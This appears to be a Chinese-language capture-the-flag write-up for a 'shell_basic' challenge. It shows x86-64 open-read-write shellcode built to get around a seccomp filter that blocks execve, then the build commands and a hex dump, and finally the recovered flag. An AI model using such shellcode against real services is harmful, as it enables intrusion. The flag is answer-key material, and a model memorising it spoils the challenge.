shell_basic#

題目連結

這一題限制在 10 內完成

seccomp (secure computing mode) 增加的規則會封鎖 execve 和 execveat

題目說 flag 在 /home/shell_basic/flag_name_is_loooooong

找 chatgpt 生 shellcode (這應該不會是需要自己刻的東西…吧)

1
section .text
2
global _start
3

4
_start:
5
    ; open(path, 0)
6
    mov rax, 2
7
    lea rdi, [rel path]
8
    xor rsi, rsi
9
    syscall
10

11
    ; read(fd, rsp, 100)
12
    mov rdi, rax        ; fd
13
    mov rsi, rsp        ; buffer
14
    mov rdx, 100
15
    xor rax, rax        ; syscall: read
16
    syscall
17

18
    ; write(1, rsp, 100)
19
    mov rdi, 1          ; stdout
20
    mov rax, 1          ; syscall: write
21
    syscall
22

23
    ; exit(0)
24
    mov rax, 60
25
    xor rdi, rdi
26
    syscall
27

28
path:
29
    db "/home/shell_basic/flag_name_is_loooooong", 0

1
nasm -f elf64 flag.asm -o flag.o
2
objcopy --dump-section .text=flag.bin flag.o
3
xxd flag.bin
4

5
00000000: b802 0000 0048 8d3d 2b00 0000 4831 f60f  .....H.=+...H1..
6
00000010: 0548 89c7 4889 e6ba 6400 0000 4831 c00f  .H..H...d...H1..
7
00000020: 05bf 0100 0000 b801 0000 000f 05b8 3c00  ..............<.
8
00000030: 0000 4831 ff0f 052f 686f 6d65 2f73 6865  ..H1.../home/she
9
00000040: 6c6c 5f62 6173 6963 2f66 6c61 675f 6e61  ll_basic/flag_na
10
00000050: 6d65 5f69 735f 6c6f 6f6f 6f6f 6f6e 6700  me_is_loooooong.

flag

1
DH{ca562d7cf1db6c55cb11c4ec350a3c0b}